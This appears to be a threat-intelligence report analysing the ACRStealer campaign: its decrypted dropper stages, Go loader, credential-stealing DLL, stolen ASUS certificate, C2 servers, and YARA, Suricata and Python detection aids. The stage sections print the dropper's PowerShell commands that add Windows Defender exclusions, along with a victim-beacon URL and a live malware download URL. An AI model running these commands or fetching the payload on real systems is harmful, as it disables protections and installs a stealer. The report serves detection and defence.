Severity: high | Category: Stealer
Investigated: March 8, 2026 | Published: March 8, 2026

ACRStealer Dissected: Decrypted Kill Chain, Stolen ASUS EV Certificate, and 9 Live C2 Servers Operating a Multi-Family Stealer Network

Tags: #stealer #vidar #acrstealer #sectoprat #dll-sideloading #phishing #social-engineering #credential-theft #c2 #apt

TL;DR: ACRStealer (Arechclient2) is running an active credential theft operation with 9 live C2 servers, a compromised .edu WordPress site still hosting payloads, and a Go 1.26.0 loader with 7 obfuscated modules. We decrypted the XOR-encoded Config.ps1 dropper (key: MnZdJGRiwLze), revealing a 4-stage kill chain that abuses Windows Defender exclusions, sideloads DLLs capable of extracting Windows Hello NGC keys and Azure AD OAuth tokens, and signs payloads with a stolen ASUSTeK EV code signing certificate. The operation shares C2 infrastructure with SectopRAT, AmateraStealer, and NetSupport RAT.


The Decrypted Kill Chain

The investigation began with an XOR-encrypted PowerShell dropper (Config.ps1) recovered from a MalwareBazaar submission. The encryption is a 12-byte rotating XOR using the key MnZdJGRiwLze (bytes: [77,110,90,100,74,71,82,105,119,76,122,101]). Decryption reveals a clean 4-stage infection chain.

Stage 1: Victim Fingerprinting

https://iplogger.co/1paLJ4

Before delivering any payload, the dropper beacons to iplogger.co with the victim's GUID, hostname ($env:COMPUTERNAME), username ($env:USERNAME), and timestamp. This is a filtering gate -- the operator uses it to identify high-value targets and discard sandboxes before committing the payload.

Stage 2: Defender Evasion

Add-MpPreference -ExclusionPath $env:TEMP
Add-MpPreference -ExclusionProcess "powershell.exe"

Two PowerShell commands add exclusions to Windows Defender: the user's %TEMP% directory (where the payload will land) and powershell.exe itself. This is T1562.001 (Impair Defenses: Disable or Modify Tools) -- simple, effective, and still surprisingly successful against default Windows configurations.

Stage 3: Payload Retrieval from Compromised .edu Site

https://acecareer.edu/wp-includes/certificates/acr-karimichikstrelyaet-639081475329349420.exe

The payload is hosted on ACE Career Education, a legitimate .edu institution running a compromised WordPress installation. The attacker buried the executable in /wp-includes/certificates/ -- a WordPress core directory that administrators rarely inspect and WAF rules typically whitelist.

The filename itself is operationally significant:

  • acr -- ACRStealer identifier
  • karimichikstrelyaet -- Russian transliteration of "каримичик стреляет" ("karimichik shoots"), confirming a Russian-speaking operator
  • 639081475329349420 -- campaign or build identifier

This payload was still live and downloadable as of 2026-03-08.

Stage 4: Execution and Cleanup

The downloaded binary lands at %TEMP%\<random12chars>.exe, executes hidden (-WindowStyle Hidden), and self-deletes after a brief runtime. No persistence mechanism at this stage -- persistence is handled by the Go loader that executes next.
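To make the decryption step concrete, here is an added example (not code from the post, and not the dropper itself) that decodes a Config.ps1-style blob with the 12-byte rotating key above and then checks the plaintext for the stage 1 to 3 indicators. The script it encodes is constructed; the beacon id and payload host are placeholders.

```python
# Added example, not code from the post: decode a Config.ps1-style dropper
# encoded with the 12-byte rotating XOR key reported above, then triage it.
import re
from typing import Optional

XOR_KEY = b"MnZdJGRiwLze"  # key bytes [77,110,90,100,74,71,82,105,119,76,122,101]

# Plaintext indicators a defender looks for once the dropper is decoded
INDICATORS = {
    "defender_exclusion_path": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "defender_exclusion_process": re.compile(r"Add-MpPreference\s+-ExclusionProcess", re.I),
    "iplogger_beacon": re.compile(r"iplogger\.co", re.I),
    "wp_includes_payload": re.compile(r"/wp-includes/", re.I),
}

def xor_rotate(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Byte i is XORed with key[i % len(key)]; XOR is its own inverse."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def printable_ratio(data: bytes) -> float:
    """Share of printable-ASCII/CR/LF/TAB bytes: script text scores near 1.0,
    output from a wrong key looks random and scores far lower."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)

def decrypt_config_ps1(blob: bytes, key: bytes = XOR_KEY) -> Optional[str]:
    """Return the decoded script, or None if the key clearly did not work."""
    data = xor_rotate(blob, key)
    if printable_ratio(data) < 0.95:
        return None
    return data.decode("ascii", errors="replace")

def triage(script: str) -> dict:
    """Map each indicator name to whether it occurs in the decoded script."""
    return {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}

# Constructed sample mirroring the stage 1-3 behaviour described in the post;
# it is not the real dropper, and the beacon id / host are placeholders.
SAMPLE_PLAINTEXT = (
    "Invoke-WebRequest ('https://iplogger.co/<id>?h=' + $env:COMPUTERNAME)\r\n"
    "Add-MpPreference -ExclusionPath $env:TEMP\r\n"
    "Add-MpPreference -ExclusionProcess \"powershell.exe\"\r\n"
    "Invoke-WebRequest 'https://<host>/wp-includes/certificates/<name>.exe'\r\n"
)
SAMPLE_BLOB = xor_rotate(SAMPLE_PLAINTEXT.encode("ascii"))  # the on-disk form

if __name__ == "__main__":
    script = decrypt_config_ps1(SAMPLE_BLOB)
    for name, hit in triage(script or "").items():
        print(f"{name:28s} {'HIT' if hit else '-'}")
```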

The Go Loader: "continental"

The Stage 3 payload retrieved from the compromised .edu site is a Go binary compiled with Go 1.26.0 (the latest release at time of analysis), indicating active development.

| Property | Value |
| --- | --- |
| SHA-256 | c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95 |
| Size | 1,897,984 bytes |
| Type | PE32 (GUI) x86, Go binary |
| Go Version | 1.26.0 |
| Module Name | continental |
| Imphash | 5af915f278815e76bad476ef32593028 |
| Compile Timestamp | 1970-01-01 (zeroed -- anti-forensic) |
| Last-Modified | 2026-03-03 |
| Source | Single main.go |

Semantic Obfuscation

The loader uses 7 innocuously named Go modules to disguise stealer functionality. The naming convention is deliberate -- a cursory inspection of exported symbols reveals nothing overtly malicious:

| Module | Subfunctions | Assessed Purpose |
| --- | --- | --- |
| main.Activities | 10 | Browser data theft (cookies, passwords, history) |
| main.Batteries | 4 | System information collection |
| main.Conversations | 2 | Messenger data extraction |
| main.Definitions | 2 | Config parsing / dead-drop C2 resolution |
| main.Happiness | 3 | Cryptocurrency wallet theft |
| main.Procurement | 6 | Credential harvesting |
| main.Supplements | 4 | Data exfiltration |

Two additional single-use functions (main.Discussionsattraction, main.Nominationsconsensus) have no subfunctions and likely serve as initialization or orchestration routines.

Network Indicators in the Binary

  • DNS resolvers hardcoded: 8.8.8.8, 1.1.1.1, 9.9.9.9 (bypasses corporate DNS for dead-drop resolution)
  • Development IPs: 192.168.1.100-102 (operator's dev environment leaked in strings)
  • Crypto API imports: CryptGenRandom, CertOpenSystemStore, CertEnumCertificatesInStore
  • C2 URLs: Encrypted at rest -- not visible in plaintext strings

The verification.google DLL: Windows Hello and Azure AD Theft

The most technically sophisticated component is a DLL sideloaded as verification.google -- a filename chosen to look like a Google domain verification file. This DLL embeds 5 legitimate Microsoft system binaries as resources, each repurposed for credential theft:

| Resource ID | Embedded DLL | Stealer Function |
| --- | --- | --- |
| resource_120 | sppc.dll | Windows license/activation data theft |
| resource_224 | fwbase.dll | Firewall state manipulation |
| resource_561 | fltLib.dll | Minifilter driver interaction (AV bypass) |
| resource_818 | aclui.dll | ACL/security permission escalation |
| resource_921 | ngc.dll | Windows Hello / NGC private key extraction |

Credential Theft Capabilities

The DLL implements a comprehensive credential harvesting toolkit:

  • ADAL/OAuth token theft -- intercepts Azure AD authentication tokens for login.microsoftonline.com, enabling cloud account takeover without password knowledge
  • Smart card certificate enumeration -- enumerates certificates on attached smart card readers, targeting enterprise PKI environments
  • Windows Hello / NGC key extraction -- extracts Next Generation Credential private keys, bypassing biometric and PIN-based authentication
  • DPAPI decryption -- calls CryptUnprotectData to decrypt locally stored credentials protected by the Windows Data Protection API
  • WinHTTP C2 communication -- uses the WinHTTP API for exfiltration, blending with legitimate Windows HTTP traffic

The DLL exports are obfuscated with generic names that mimic a legitimate SDK: AllocateNamespaceData, CreateNotificationEx, OpenSchemaAsync, ResetPropertiesEx, ValidateEndpointEx. Internally, the code uses VM-based obfuscation with a state machine driving execution flow through the exports.

Stolen ASUSTeK EV Code Signing Certificate

One distribution vector uses a stolen Extended Validation code signing certificate from ASUSTeK Computer Inc.

| Property | Value |
| --- | --- |
| Subject | ASUSTeK COMPUTER INC. |
| Registry | #23638777, Taipei City |
| Issuer | DigiCert Trusted G4 Code Signing RSA4096 SHA384 |
| Signed Binary | sunwukongs.exe |
| Disguise | ASUS AI Suite III |
| Registry Check | SOFTWARE\ASUS\AI-SUITE_II\ |
| SHA-256 | 430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559 |

The binary sunwukongs.exe masquerades as ASUS AI Suite III and checks for the ASUS registry key to determine if it is running on a genuine ASUS system. The stolen EV certificate means the payload passes SmartScreen, most application whitelisting solutions, and default Authenticode verification -- it appears to be legitimately signed by one of the world's largest hardware manufacturers.

"Sun Wukong" (the Monkey King) is a character from Chinese mythology, though the Russian-language indicators elsewhere in the campaign suggest the operator is Russian-speaking, not Chinese.

DLL Sideloading Matrix

ACRStealer uses multiple DLL sideloading vectors to execute its payloads through legitimate binaries:

| Sideloading DLL | Legitimate Host Binary | Observed Samples |
| --- | --- | --- |
| python311.dll / python312.dll / python315.dll | Python interpreter | 10+ |
| wke.dll | Web toolkit engine | 6 |
| verification.google | Unknown | 2 |
| CrashRpt1403.dll | CrashRpt crash reporter | 1 |

The Python DLL sideloading is the most prolific vector -- the operator bundles a legitimate Python interpreter with a malicious python3XX.dll that gets loaded before the real one. The progression from python311 to python315 tracks Python's release cycle, suggesting the operator updates the sideloading target with each new Python release to maximize compatibility.

Distribution Ecosystem

ACRStealer does not operate in isolation. It sits at the center of a multi-family distribution network with at least 6 distinct delivery mechanisms:

| Delivery Method | Description |
| --- | --- |
| ClickFix / FakeCAPTCHA | Social engineering via fake CAPTCHA verification pages (March 2026 wave) |
| OffLoader | Secondary dropper; delivers sunwukongs.exe |
| HIjackLoader / IDATLoader | Loader chain for initial delivery |
| RenPyLoader | Novel loader disguised as Ren'Py game engine runtime |
| AsgardProtector | Fake security tool ("your PC is at risk") |
| AmateraStealer | Cross-family delivery partnership |

The dead-drop C2 resolver is also noteworthy: ACRStealer resolves its actual C2 address by reading encoded strings from Steam Community profiles and Google user profiles -- a technique that makes the C2 address impossible to extract from the binary alone and trivial for the operator to rotate.

C2 Infrastructure: 18 IPs, 9 Live, 50% Churn

All live TLS-enabled C2 servers share an identical fingerprint:

  • Self-signed TLS certificate with CN=<IP address> (not a domain)
  • 1-year validity period, issued within days of deployment
  • HTTP GET returns 405 Method Not Allowed
  • HTTP POST returns 400 Bad Request (requires valid stealer beacon format)
  • Single port: 443
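As an added example (not from the post), the following scores certificate observations against that fingerprint and flags only records that show every trait at once. The JSON record shape (dst_ip, dst_port, subject, issuer, not_before, not_after) is an assumption to adapt to your sensor's schema, and the records are constructed with documentation-range addresses rather than the live C2 IPs.

```python
# Added example, not code from the post: flag TLS certificate observations that
# match the ACRStealer C2 fingerprint above (self-signed, CN is a bare IPv4
# literal, roughly one-year validity, port 443). The record shape is assumed.
import ipaddress
import json
from datetime import datetime

REQUIRED = ("self_signed", "cn_is_ip", "one_year_validity", "port_443")

def extract_cn(dn):
    """CN attribute of an RFC 4514-style DN such as 'CN=1.2.3.4,O=x', else None."""
    parts = (p.strip().partition("=") for p in dn.split(","))
    return next((v.strip() for k, _, v in parts if k.strip().upper() == "CN"), None)

def is_ipv4_literal(value):
    """True for a bare dotted quad only; hostnames and None are rejected."""
    try:
        return isinstance(ipaddress.ip_address(value or ""), ipaddress.IPv4Address)
    except ValueError:
        return False

def traits(rec):
    """Set of fingerprint traits one observation exhibits (the post reports a
    1-year certificate lifetime on every live C2, hence the 360-370 day window)."""
    found = set()
    subject, issuer = rec.get("subject", ""), rec.get("issuer", "")
    if subject and subject == issuer:
        found.add("self_signed")
    if is_ipv4_literal(extract_cn(subject)):
        found.add("cn_is_ip")
    span = datetime.fromisoformat(rec["not_after"]) - datetime.fromisoformat(rec["not_before"])
    if 360 <= span.days <= 370:
        found.add("one_year_validity")
    if rec.get("dst_port") == 443:
        found.add("port_443")
    return found

def flag_c2_candidates(lines):
    """(server_ip, sorted traits) for every JSON record showing all REQUIRED traits."""
    hits = []
    for rec in map(json.loads, lines):
        t = traits(rec)
        if all(r in t for r in REQUIRED):
            hits.append((rec["dst_ip"], sorted(t)))
    return hits

# Constructed observations; 203.0.113.0/24 is documentation space, not a real C2
def _rec(ip, subject, issuer, not_before, not_after):
    return json.dumps({"dst_ip": ip, "dst_port": 443, "subject": subject, "issuer": issuer,
                       "not_before": not_before, "not_after": not_after})
SAMPLE_LOG = [
    _rec("203.0.113.7", "CN=203.0.113.7", "CN=203.0.113.7", "2026-03-03T00:00:00+00:00", "2027-03-03T00:00:00+00:00"),
    _rec("203.0.113.8", "CN=www.example.com", "CN=Example CA,O=Example", "2026-01-01T00:00:00+00:00", "2026-12-31T00:00:00+00:00"),  # CA-issued
    _rec("203.0.113.9", "CN=203.0.113.9", "CN=203.0.113.9", "2020-01-01T00:00:00+00:00", "2030-01-01T00:00:00+00:00"),  # 10-year lab cert
]
```

Only the first record is flagged: the CA-issued hostname certificate and the long-lived self-signed appliance certificate each miss at least one trait.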

Active C2 Servers (as of 2026-03-08)

| IP | Cert Created | Tags | First Seen |
| --- | --- | --- | --- |
| 212.118.41.180 | 2026-02-10 | dllHijack | 2026-02-20 |
| 193.33.195.37 | 2026-02-20 | -- | 2026-02-22 |
| 46.149.72.66 | 2026-03-03 | acecareer-edu | 2026-03-07 |
| 46.149.72.226 | 2026-03-05 | dllHijack | 2026-03-07 |
| 77.91.96.209 | 2026-03-05 | RenPyLoader | 2026-03-07 |
| 45.150.34.0 | 2026-03-06 | OffLoader | 2026-03-07 |
| 94.26.106.216 | -- | SectopRAT (no TLS) | 2026-03-07 |
| 91.84.123.250 | -- | SectopRAT (no TLS) | 2026-03-07 |
| 116.203.167.195 | -- | ClickFix, NetSupport (no TLS) | 2026-03-01 |

Dead C2 Servers

| IP | Tags | First Seen |
| --- | --- | --- |
| 212.34.155.34 | OffLoader | 2026-02-07 |
| 144.124.236.99 | dllHijack | 2026-02-13 |
| 144.124.233.47 | dllHijack | 2026-02-20 |
| 146.103.103.78 | OffLoader | 2026-02-22 |
| 144.124.246.132 | AsgardProtector | 2026-02-24 |
| 146.103.104.188 | dllHijack | 2026-03-01 |
| 185.121.235.118 | ClickFix, AmateraStealer | 2026-03-01 |
| 77.238.228.60 | ClickFix, FakeCaptcha | 2026-03-01 |
| 89.110.118.6 | AmateraStealer | 2026-03-05 |

Infrastructure Observations

  • 50% churn rate -- 9 of 18 known IPs are already dead, indicating rapid rotation on roughly 2-week cycles
  • Multi-provider hosting -- IPs spread across many ASNs with no single bulletproof host, making ASN-level blocking ineffective
  • 3 non-TLS C2s -- 91.84.123.250, 94.26.106.216, 116.203.167.195 lack TLS and may run a different C2 panel variant
  • Certificate pattern -- self-signed, CN=<IP>, 1-year validity, created 1-3 days before first observed sample tagging

Cross-Family Infrastructure Overlap

Shared C2 infrastructure reveals operational relationships between multiple malware families:

| Family | Relationship | Shared Infrastructure |
| --- | --- | --- |
| SectopRAT / Arechclient2 | Same operator | 94.26.106.216, 91.84.123.250 |
| AmateraStealer | Distribution partner | 89.110.118.6, 185.121.235.118 |
| ClickFix / FakeCAPTCHA | Delivery vector | Multiple samples via fake CAPTCHA pages |
| HIjackLoader / IDATLoader | Loader chain | Used for initial delivery |
| OffLoader | Dropper | Drops sunwukongs.exe |
| Vidar | Same campaign | Co-distributed via groveri.eu lures |
| NetSupport RAT | Co-delivered | Shared ClickFix infrastructure (116.203.167.195) |

The SectopRAT overlap is the strongest signal -- SectopRAT is the .NET variant of the same Arechclient2 family, and the shared C2 IPs confirm a single operator running both the Go-based ACRStealer and the .NET-based SectopRAT from the same infrastructure.

MITRE ATT&CK Mapping

| Tactic | Technique | ID | Implementation |
| --- | --- | --- | --- |
| Resource Development | Compromise Infrastructure | T1584.004 | Compromised acecareer.edu WordPress for payload hosting |
| Resource Development | Code Signing Certificates | T1588.003 | Stolen ASUSTeK EV certificate |
| Initial Access | Phishing | T1566 | ClickFix/FakeCAPTCHA social engineering |
| Execution | User Execution: Malicious File | T1204.002 | Fake CAPTCHA triggers PowerShell execution |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Config.ps1 dropper |
| Persistence | Hijack Execution Flow: DLL Side-Loading | T1574.002 | python3XX.dll, wke.dll, verification.google, CrashRpt1403.dll |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Defender exclusion for %TEMP% and powershell.exe |
| Defense Evasion | Subvert Trust Controls: Code Signing | T1553.002 | Stolen ASUSTeK EV cert passes SmartScreen |
| Defense Evasion | Obfuscated Files or Information | T1027 | XOR-encrypted Config.ps1, VM-obfuscated DLL |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Payload self-deletes after execution |
| Credential Access | Credentials from Password Stores | T1555 | DPAPI decryption via CryptUnprotectData |
| Credential Access | Credentials from Web Browsers | T1555.003 | Browser credential, cookie, history theft |
| Credential Access | Steal Application Access Token | T1528 | ADAL/OAuth token theft (Azure AD) |
| Credential Access | Steal Web Session Cookie | T1539 | Browser session cookie extraction |
| Credential Access | Unsecured Credentials | T1552 | Windows Hello NGC key extraction |
| Discovery | System Information Discovery | T1082 | main.Batteries module, iplogger.co beacon |
| Collection | Data from Local System | T1005 | Smart card cert enumeration, wallet data |
| Command and Control | Web Service: Dead Drop Resolver | T1102.001 | Steam Community / Google profile C2 resolution |
| Command and Control | Encrypted Channel | T1573 | Self-signed TLS to C2 servers |
| Command and Control | Application Layer Protocol: Web | T1071.001 | HTTPS POST exfiltration |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Stolen data exfiltrated via same HTTPS channel |

Indicators of Compromise

C2 IPs -- Live (listed with tags and dates in the Active C2 Servers table above)

C2 IPs -- Dead (historical; listed with tags and dates in the Dead C2 Servers table above)

URLs

https://iplogger.co/1paLJ4
https://acecareer.edu/wp-includes/certificates/acr-karimichikstrelyaet-639081475329349420.exe

File Indicators

| Filename | SHA-256 | Description |
| --- | --- | --- |
| Go Loader (continental) | c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95 | Stage 3 payload, Go 1.26.0 |
| verification.google | 4df58b7e964f595fbdd1a345ea8a42d7477a473527174eb07aba7a236369933b | Sideloaded DLL with NGC/ADAL theft |
| sunwukongs.exe | 430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559 | Stolen ASUSTeK EV-signed binary |

Encryption

Config.ps1 XOR key: MnZdJGRiwLze (12-byte rotating)
Key bytes: [77, 110, 90, 100, 74, 71, 82, 105, 119, 76, 122, 101]

YARA Detection Opportunities

rule ACRStealer_Go_Loader_Continental {
    meta:
        description = "Detects ACRStealer Go loader with 'continental' module name"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $module = "continental" ascii
        $go_ver = "go1.26" ascii
        $fn1 = "main.Activities" ascii
        $fn2 = "main.Batteries" ascii
        $fn3 = "main.Conversations" ascii
        $fn4 = "main.Definitions" ascii
        $fn5 = "main.Happiness" ascii
        $fn6 = "main.Procurement" ascii
        $fn7 = "main.Supplements" ascii
        $disc = "main.Discussionsattraction" ascii
        $nom = "main.Nominationsconsensus" ascii
    condition:
        // $disc and $nom must be referenced or YARA rejects the rule as having
        // unreferenced strings; the two orchestration symbols together also qualify
        uint16(0) == 0x5A4D and
        $module and $go_ver and
        (4 of ($fn*) or ($disc and $nom))
}

rule ACRStealer_Verification_Google_DLL {
    meta:
        description = "Detects ACRStealer verification.google DLL with embedded Microsoft binaries"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
    strings:
        $exp1 = "AllocateNamespaceData" ascii
        $exp2 = "CreateNotificationEx" ascii
        $exp3 = "OpenSchemaAsync" ascii
        $exp4 = "ResetPropertiesEx" ascii
        $exp5 = "ValidateEndpointEx" ascii
        $res1 = "sppc.dll" ascii wide
        $res2 = "ngc.dll" ascii wide
        $res3 = "fltLib.dll" ascii wide
        $res4 = "aclui.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        3 of ($exp*) and
        2 of ($res*)
}

rule ACRStealer_Config_PS1_XOR {
    meta:
        description = "Detects ACRStealer XOR-encrypted PowerShell dropper"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        tlp = "TLP:CLEAR"
    strings:
        $xor_key = { 4D 6E 5A 64 4A 47 52 69 77 4C 7A 65 }
        $defender1 = "Add-MpPreference" ascii wide nocase
        $defender2 = "-ExclusionPath" ascii wide nocase
        $defender3 = "-ExclusionProcess" ascii wide nocase
        $iplogger = "iplogger.co" ascii wide
    condition:
        $xor_key or
        (2 of ($defender*) and $iplogger)
}

Network Detection -- Snort/Suricata

# ACRStealer C2 -- self-signed cert with CN=<IP> (common across all live TLS servers).
# The server certificate travels server-to-client, so the header and flow keyword
# point that way; the pcre limits the CN match to a bare dotted quad.
alert tls [45.150.34.0,46.149.72.66,46.149.72.226,77.91.96.209,193.33.195.37,212.118.41.180] 443 -> any any \
  (msg:"ACRSTEALER C2 Self-Signed Cert CN=IP"; flow:established,to_client; \
  tls.cert_subject; content:"CN="; pcre:"/^CN=\d{1,3}(\.\d{1,3}){3}$/"; \
  sid:2026030801; rev:1;)

# ACRStealer -- compromised .edu payload delivery. The observed URL is HTTPS, so the
# Host/URI rule only fires where TLS is terminated or inspected; the SNI rule covers
# the encrypted case (expect benign hits from the institution's own users).
alert http any any -> any any (msg:"ACRSTEALER Payload Download from Compromised EDU"; \
  flow:established,to_server; content:"acecareer.edu"; http_host; \
  content:"/wp-includes/certificates/"; http_uri; sid:2026030802; rev:1;)
alert tls any any -> any any (msg:"ACRSTEALER TLS SNI to Compromised EDU Payload Host"; \
  flow:established,to_server; tls.sni; content:"acecareer.edu"; sid:2026030805; rev:1;)

# ACRStealer -- iplogger.co victim beacon (same HTTPS caveat as above)
alert http any any -> any any (msg:"ACRSTEALER Victim Beacon to iplogger"; \
  flow:established,to_server; content:"iplogger.co"; http_host; content:"/1paLJ4"; http_uri; \
  sid:2026030803; rev:1;)
alert tls any any -> any any (msg:"ACRSTEALER TLS SNI to iplogger.co"; \
  flow:established,to_server; tls.sni; content:"iplogger.co"; sid:2026030806; rev:1;)

# ACRStealer -- Defender exclusion via PowerShell. "any" is not a valid protocol;
# "ip" matches the plaintext script in transit (e.g. after TLS termination).
# Inside the XOR-encoded Config.ps1 these strings are not visible, so the host
# equivalent is PowerShell script block logging / EDR on Add-MpPreference.
alert ip any any -> any any (msg:"ACRSTEALER Defender Exclusion PowerShell"; \
  content:"Add-MpPreference"; content:"-ExclusionPath"; content:"TEMP"; \
  sid:2026030804; rev:1;)

Published by Breakglass Intelligence. Investigation conducted 2026-03-08. 50 MalwareBazaar samples analyzed. 9 live C2 servers confirmed. Compromised .edu payload host still active. Classification: TLP:CLEAR
